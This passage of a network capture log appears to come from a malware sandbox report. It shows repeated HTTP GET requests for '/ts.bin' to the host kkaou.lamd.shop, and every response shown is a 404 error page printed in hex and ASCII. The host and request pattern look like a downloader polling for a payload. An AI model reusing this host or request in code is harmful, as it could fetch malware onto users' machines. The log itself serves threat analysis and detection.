                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:29.473236084 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:29.860090971 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:15 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:29.974250078 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:30.284169912 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:30.363446951 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:15 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:30.475127935 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:30.860749960 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:16 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:30.974847078 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:31.360774994 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:16 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:31.540406942 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:31.926078081 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:17 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:32.035494089 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:32.443674088 CET191INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:17 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Nov 25, 2024 07:10:32.738908052 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:33.124866962 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:18 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:33.238837957 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:33.625447989 CET191INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:19 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Nov 25, 2024 07:10:33.926424980 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:34.314548016 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:19 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:34.491456032 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:34.877345085 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:20 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:34.988887072 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:35.374588966 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:20 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:35.488842010 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:35.875111103 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:21 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:35.988814116 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:36.375479937 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:21 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:36.488810062 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:36.874792099 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:22 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
